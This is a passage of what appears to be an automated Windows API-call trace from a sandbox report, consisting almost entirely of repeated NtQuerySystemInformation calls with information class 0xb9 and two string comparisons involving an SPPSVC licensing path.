(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x28, ResultLength=0x0) [0229.618] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0229.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0229.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x28, ResultLength=0x0) [0229.627] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0229.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0229.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0229.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 